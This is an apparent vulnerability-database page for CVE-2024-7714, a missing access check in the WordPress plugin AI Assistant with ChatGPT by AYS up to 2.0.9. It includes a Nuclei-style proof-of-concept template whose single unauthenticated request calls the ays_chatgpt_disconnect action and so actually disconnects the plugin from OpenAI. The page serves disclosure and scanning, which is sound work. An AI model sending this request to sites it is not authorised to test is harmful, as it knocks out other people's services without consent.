CVE-2024-7714: AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls

2025-08-01 AI Assistant with ChatGPT by AYS PoC Public

Description

The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback

PoC

id: CVE-2024-7714

info:
  name: AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls
  author: s4e-io
  severity: medium
  description: |
    The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback
  impact: |
    Unauthenticated attackers can disconnect the plugin from OpenAI and manipulate plugin settings through unprotected AJAX endpoints, causing denial of service and disrupting ChatGPT assistant functionality.
  remediation: |
    Fixed in 2.1.0
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7714
    - https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2024-7714
    cwe-id: CWE-284
    epss-score: 0.00848
    epss-percentile: 0.56312
  metadata:
    verified: true
    max-request: 1
    vendor: ays-chatgpt-assistant-team
    product: ays-chatgpt-assistant
    framework: wordpress
    publicwww-query: "/wp-content/plugins/ays-chatgpt-assistant"
  tags: cve,cve2024,ays-chatgpt-assistant,wordpress,wp-plugin,wp,iac,vuln,ai

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect"

    matchers:
      - type: dsl
        dsl:
          - 'regex("^true$", body)'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450221009c6946517e62ff16d3bd030f4db22d5bb03fdfc1a270439c7aafc8d52d5cd1df02200c265a81589934d0a1c24f65fc8531db028809404c698c4e50b0ce568c301513:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities